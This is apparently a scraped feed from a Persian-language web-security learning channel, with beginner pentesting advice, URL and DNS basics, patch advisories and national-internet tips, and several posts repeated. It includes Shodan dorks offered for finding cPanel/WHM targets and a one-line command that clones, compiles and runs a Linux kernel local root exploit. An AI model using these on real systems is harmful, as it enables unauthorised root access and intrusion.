قبل از هرچیز بگم بزرگترین اشتباه خودم تو این مدت چی بود؟؟؟خوندن و خوندن و خوندن.... و منتظر این بودن ک تیم آپ کنیم گروهی کار کنیم
بهش میگن آماده شدن برای آماده شدن... ی لوپ تکراری. هی فک میکنی کمه.... من تاحالا بیش از 1000تا رایتاپ خوندم....چندتا کتاب تخصصی خوندم....مث برنامه نویسیه.باید دست ب کیبورد شین و تست کنین و تست کنین....ابزار؟ devtools مرورگر. تهش Burp... تارگت؟لابراتوار های خارجی یا داخلی. یا ی تارگت واقعی ک میگم چجوری پیداش کنی
. متودولوژی میتونی واسه خودت بسازی...میگم چجوری. یه لطفی به خودت بکن و تمرکزتو بذار رو فهم کانسپت ها... ول کن اسم هارو... ساده بگیر. جدی میگم
شاید تنها شغلی که با اومدن ai داغتر شده همین امنیت و پن تست باشه.... تنور حسابی داغه. آماده ای؟ 
(ایرانی بودن محدودیت هست ولیییی من بهت یه راه دیگه میگم.کی گفته مجبوریم ایرانی کار کنیم؟
)
۰:۰۸
یه نکته ای بگم ک واسه خودم اولاش خیلی سوال بود؟!
همیشه میدیدم نوشته Attacker.com یا evil.com. تو رایتاپ ها یا آموزش ها که میخوندم فک میکردم حتما باید خودم ی vps بگیرم ی سایت بسازم و...(واسه یسری آسیبپذیری ها خب بله بعدن.. ) ولیما خیلی وقتا همینقد ک بدونیم درخواست میاد کافیه.ی سایتی هست ب اسم webhook.site میتونین ازون استفاده کنین
خداشاهده این ی مدت طولانی سوال خودم بود. ی آدرس بهتون میده ک ب عنوان مثلا سایت اتکر ازش استفاده میکنین.جواب تستا میاد اونجا براتون
میخام بگم اولاش یسری سوالا ممکنه براتون پیش بیاد ک اصن تکنیکالم نیست. طبیعیه.بپرسین.🫡@websecpath
۱:۴۸
در حال حاضر نمایش این پیام پشتیبانی نمیشود.
WebSecPath | امنیت و زبان
سی پنل مجدد چند ساعت پیش آپدیت امنیتی داد ( این باگ نیز به شدت خطرناک هست و به کاربر اجازه میده بتونه تبدیل به ادمین ( روت ) شود ) مجدد آپدیت کنید بعد از آپدیت باید نسخه های زیر یا بالاتر باشد 11.136.0.9 and higher 11.134.0.25 and higher 11.132.0.31 and higher 11.130.0.22 and higher 11.126.0.58 and higher 11.124.0.37 and higher 11.118.0.66 and higher 11.110.0.116 and higher 11.110.0.117 and higher 11.102.0.41 and higher 11.94.0.30 and higher 11.86.0.43 and higher
همش رو یه \r\n میشه هااااامن نمیگم چجوری ولی با این sodan dork میتونین تارگت پیدا کنین. بسم الله
title:"WHM Login"title:"WebHost Manager" port:2087product:"cPanel" port:2087http.title:"cPanel" port:2083ssl.cert.subject.cn:"cPanel" port:2087
@websecpath
@websecpath
۴:۰۴
رو 70میلیوووون Domain تاثیر گذاشته تاحالا
کلن 4تامرحله داره این حمله....ترسناکه نه؟


قلقلکم میاد ولی خب دختر خوبی ام اجازه میگیرم قبلش🦭
یاGCC! مَسموح؟

یاGCC! مَسموح؟
۴:۱۴
برای بار آخر میپرسم
یا امانه مجلس التعاون الخلیجی،هل من اذن؟ 
عروس خانوم رفته واسه باباش نفت بیاره
گیلیلیلیلیلیلی
۴:۲۰
اول وارد وب سایت زیر میشی و اکستنشن مورد نظرت جستجو و دانلود میکنی :
vscode.devneeds.ir 
حالا وارد VS Code میشی و دکمه های ترکیبی Ctrl+Shift+P میزنی.

داخل نوار جستجو ای که باز میشه ، عبارت زیر مینویسی و انتخابش میکنی :
Extensions: Install from VSIX
وقتی گزینه بالا را انتخاب کردی ، یدونه پنجره باز میشه و ازت میخواد فایل اکستنشن دانلود شده را بهش بدی و تمام.

️ @webehsan 
روش نصب اکستنشن vscode با نت ملی 
حالا وارد VS Code میشی و دکمه های ترکیبی Ctrl+Shift+P میزنی.
داخل نوار جستجو ای که باز میشه ، عبارت زیر مینویسی و انتخابش میکنی :
Extensions: Install from VSIX
وقتی گزینه بالا را انتخاب کردی ، یدونه پنجره باز میشه و ازت میخواد فایل اکستنشن دانلود شده را بهش بدی و تمام.
۱۲:۵۶
nohup command &
@lpicfarsi
۱۳:۰۰
دوباره یه مشکل امنیتی حاد در کرنل لینوکس داریم که باهاش هر یوزر لوکال می تونه دسترسی روت بگیره. بهش می گن درتی فرگ.
رپوزیتوری اینجاست:https://github.com/V4bel/dirtyfragو دستوری که دسترسی می ده اینه: git clone https://github.com/V4bel/dirtyfrag.git && cd dirtyfrag && gcc -O0 -Wall -o exp exp.c -lutil && ./exp
که مشخصه یه فایل رو میگیره و کامپایل و اجرا می کنه. این فایل سی، توی یه زنجیره پیش می ره: فایل سو رو لود می کنه، یه پایپ درست می کنه، هر دو رو توی یک فرگمنت از یه پیج نگه می داره و بعد دسترسی نوشتن میگیره و تغییرش می ده و بعد دیگه می شه اجراش کرد.
توی این ویدئو تا حد معقولی با نگاه به کدهای کرنل توضیحش می دم:https://youtu.be/DbXWIYpxCVE
آپدیت کنین و تکرار کنین که قطع اینترنت چند تا سرور و کامپیوتر شخصی رو در کشور رو ناامن نگه خواهد داشت.
#لینوکس #امنیت@LearnSecpath
رپوزیتوری اینجاست:https://github.com/V4bel/dirtyfragو دستوری که دسترسی می ده اینه: git clone https://github.com/V4bel/dirtyfrag.git && cd dirtyfrag && gcc -O0 -Wall -o exp exp.c -lutil && ./exp
که مشخصه یه فایل رو میگیره و کامپایل و اجرا می کنه. این فایل سی، توی یه زنجیره پیش می ره: فایل سو رو لود می کنه، یه پایپ درست می کنه، هر دو رو توی یک فرگمنت از یه پیج نگه می داره و بعد دسترسی نوشتن میگیره و تغییرش می ده و بعد دیگه می شه اجراش کرد.
توی این ویدئو تا حد معقولی با نگاه به کدهای کرنل توضیحش می دم:https://youtu.be/DbXWIYpxCVE
آپدیت کنین و تکرار کنین که قطع اینترنت چند تا سرور و کامپیوتر شخصی رو در کشور رو ناامن نگه خواهد داشت.
#لینوکس #امنیت@LearnSecpath
۱۷:۰۷
چرا URL اینقدر مهمه؟
چون:
کل وب بر پایه URL ساخته شده
مرورگر بر اساس URL تصمیم امنیتی میگیره
Origin از URL ساخته میشه(مباحث مربوط به same origin & Cross site & same site) بعد درک url و مرورگر خیلی از آسیب پذیری ها و مکانیزم های مرورگر که گاهن حتا تداخل پارسر ها توش ایجاد باگ و آسیب پذیری میکنه رو درک میکنی
URL فقط «آدرس» نیست

مرورگر با URL تصمیم میگیره:به کجا وصل شهچه پورتی استفاده شودآیا SOP اجازه دسترسی دارهآیا Cookie ارسال شهآیا HTTPS لازمهآیا CSP اعمال شهو... 
https://admin.shop.example.com:8443/dashboard/users?id=7&role=admin#profileاین یه نمونه س که میخایم تیکه تیکه ش کنیم
@websecpath
https://admin.shop.example.com:8443/dashboard/users?id=7&role=admin#profileاین یه نمونه س که میخایم تیکه تیکه ش کنیم
@websecpath
۳:۵۸
وقتی کاربر اینو وارد میکنه:
https://shop.example.com/productsمرورگر فقط «صفحه باز نمیکنه».
پشت صحنه:DNSPortTCPTLSHTTPو..همه فعال میشن
DNS دفترچه تلفن وب عه
ما url رو(دامنه) رو وارد مرورگر میکنیم. ولی کامپیوتر ها ip رو میفهمن. DNS دامنه رو به ip تبدیل میکنه
https://google.com
142.250.x.x
مرورگر به این ip وصل میشه در اصل
مثلن شما تو گوشیتون شماره من رو به اسم 'بنده خدا' ذخیره کردین. شما اسم رو انتخاب میکنین. ولی وقتی call انجام میدین شماره منه که بهش تماس برقرار شده. گوشی شما که منو نمیشناسه
@websecpath
ما url رو(دامنه) رو وارد مرورگر میکنیم. ولی کامپیوتر ها ip رو میفهمن. DNS دامنه رو به ip تبدیل میکنه
https://google.com
مثلن شما تو گوشیتون شماره من رو به اسم 'بنده خدا' ذخیره کردین. شما اسم رو انتخاب میکنین. ولی وقتی call انجام میدین شماره منه که بهش تماس برقرار شده. گوشی شما که منو نمیشناسه
@websecpath
۴:۱۷
در حال حاضر نمایش این پیام پشتیبانی نمیشود.
شاید ندونی ولی
اولین برنامهنویس دنیا یه خانوم بود به اسم «آدا لاولیس»
حدود ۲۰۰ سال پیش، قبل از اینکه کامپیوتر اصلاً وجود داشته باشه، اون یه سری دستورالعمل (همون الگوریتم) نوشت برای ماشین محاسباتی چارلز بابیج. خلاصه که اولین کسی بود که فهمید ماشین فقط حسابوکتاب نیست، میشه با اون کارای دیگه هم کرد.
پس هر وقت برنامهنویسی کردی، بدون اولین بار یه خانوم این راه رو باز کرده
@websecpath
اولین برنامهنویس دنیا یه خانوم بود به اسم «آدا لاولیس»
حدود ۲۰۰ سال پیش، قبل از اینکه کامپیوتر اصلاً وجود داشته باشه، اون یه سری دستورالعمل (همون الگوریتم) نوشت برای ماشین محاسباتی چارلز بابیج. خلاصه که اولین کسی بود که فهمید ماشین فقط حسابوکتاب نیست، میشه با اون کارای دیگه هم کرد.
پس هر وقت برنامهنویسی کردی، بدون اولین بار یه خانوم این راه رو باز کرده
۵:۲۰
بازارسال شده از TheAliBigdeli Channel
امینت ارزش افزوده نیست واجبه
دوستان، یه صحبتی داشتم؛ همونطور که میدونید همیشه توی کدهای وب یه سری خلاءهای امنیتی هست که یا نمیدونیم یا از دستمون در میره. چیزایی مثل هدرهای ناقص، CORS غلط، اعتبارسنجی (Validation) ضعیف، یا مدیریت بدِ Environment Variableها. حتی فراموش کردن آپدیت نگهداشتن پکیجها (Dependabot) هم یه گلوگاه جدیه.
برای همین تصمیم گرفتم با سرکار خانم فیض از کانال @websecpath هماهنگ کنیم تا یه چکلیست و استاندارد امنیتی براشون تعریف کنیم.هدفمون اینه که دیگه فقط "کار کردن پروژه" کافی نباشه؛ میخوایم یه ارزش افزوده واقعی به مشتری بدیم. یعنی کدی که نه تنها باگ نداره، بلکه از نظر امنیتی (Secure Code) هم محکم و ایمنه و ما هم خیلمون راحت که چیزی از قلم نیفتاده.
اطلاعات به صورت خورد بر روی کانال خودشون قرار میگیره و می تونین استفاده کنین و جلسات مربوط بهش رو هم سعی میکنم پیگیری کنم و برگزار کنیم.
@thealibigdeli_channel#security#secure_code
دوستان، یه صحبتی داشتم؛ همونطور که میدونید همیشه توی کدهای وب یه سری خلاءهای امنیتی هست که یا نمیدونیم یا از دستمون در میره. چیزایی مثل هدرهای ناقص، CORS غلط، اعتبارسنجی (Validation) ضعیف، یا مدیریت بدِ Environment Variableها. حتی فراموش کردن آپدیت نگهداشتن پکیجها (Dependabot) هم یه گلوگاه جدیه.
برای همین تصمیم گرفتم با سرکار خانم فیض از کانال @websecpath هماهنگ کنیم تا یه چکلیست و استاندارد امنیتی براشون تعریف کنیم.هدفمون اینه که دیگه فقط "کار کردن پروژه" کافی نباشه؛ میخوایم یه ارزش افزوده واقعی به مشتری بدیم. یعنی کدی که نه تنها باگ نداره، بلکه از نظر امنیتی (Secure Code) هم محکم و ایمنه و ما هم خیلمون راحت که چیزی از قلم نیفتاده.
اطلاعات به صورت خورد بر روی کانال خودشون قرار میگیره و می تونین استفاده کنین و جلسات مربوط بهش رو هم سعی میکنم پیگیری کنم و برگزار کنیم.
@thealibigdeli_channel#security#secure_code
۷:۱۰
برای ثبتنام اینترنت پرو به کسی هزینه ندیناز طریق این سایت خودتون ثبتنام کنید
https://manatsp.ir/flm/سامانه ثبتنام اینترنت پرو
معمولا اگر تایید بشه حدود یک هفته بعد پیام براتون میاد و میتونین از تلگرام و واتساپ بدون فیلتر استفاده کنید.
در هر صورت من ثبت نام نمیکنم....
۸:۴۱
نصب کردن سرورها و سرویسهای لینوکسی با نت ملی
مشاهده کردن لیست پخش
بخش های این لیست
نصب کردن آرچ با نت ملی
نصب توزیع آلپاین ( Alpine Linux) با نت ملی
نصب و راه اندازی آلما لینوکس سرور با نت ملی
دوره آموزش استفاده از لینوکس mint : بخش سوم اضافه کردن محزن ملی
استفاده از سرور زمان در نت ملی
نصب و پیاده سازی ساده ansible با نت ملی
راه اندازی زبیکس با نت ملی
نصب و راه اندازی داکر با نت ملی ایران
موفق باشید
@lpicfarsi
مشاهده کردن لیست پخش
بخش های این لیست
نصب کردن آرچ با نت ملی
نصب توزیع آلپاین ( Alpine Linux) با نت ملی
نصب و راه اندازی آلما لینوکس سرور با نت ملی
دوره آموزش استفاده از لینوکس mint : بخش سوم اضافه کردن محزن ملی
استفاده از سرور زمان در نت ملی
نصب و پیاده سازی ساده ansible با نت ملی
راه اندازی زبیکس با نت ملی
نصب و راه اندازی داکر با نت ملی ایران
موفق باشید
@lpicfarsi
۱۰:۱۳
اینکه جای 'مناسبی' هستی، به این معنی نیست که جای 'درستی' هستی
Websecpath
۱۲:۴۸
بازارسال شده از ربات پیام ناشناس
ble.ir/payamresanimbot?start=2rsNHMubpM775ZnB6rP5iNuEj
۱۴:۵۳
سوال، انتقاد، پیشنهاد





۱۴:۵۴
۱۴:۵۸